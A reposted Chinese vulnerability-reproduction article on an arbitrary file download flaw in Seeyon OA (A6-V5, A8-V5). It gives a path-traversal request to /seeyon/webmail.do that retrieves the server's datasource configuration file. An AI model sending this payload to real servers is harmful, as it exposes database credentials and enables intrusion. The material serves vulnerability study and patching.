致遠OA 任意文件下載漏洞（webmail.do文件）

本文轉載自查看原文 2021-01-21 18:18 2512 漏洞復現

介紹

致遠OA是北京致遠互聯軟件股份有限公司研發一款辦公系統。

致遠OA webmail.do文件讀取漏洞，
由於 /seeyon/webmail.do 頁面 filePath 參數過濾不嚴，導致可以讀取系統敏感文件。

通過修改filePath參數來下載服務器文件
/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

A6-V5、A8-V5

訪問

http://xx.xx.xxx.xx/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

datasourceCtp.properties文件內容為：

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 致遠OA任意文件上傳漏洞復現致遠OA htmlofficeservlet任意文件寫入漏洞 seeyou 致遠OA 任意文件上傳任意文件下載(pikachu) 任意文件下載漏洞的接口URL構造分析與討論任意文件下載包含https的圖片 PHPCMS V9 任意文件下載(Windows) 通達OA 任意文件上傳+文件包含導致RCE漏洞復現通達OA任意文件上傳和文件包含漏洞導致RCE 任意文件上傳漏洞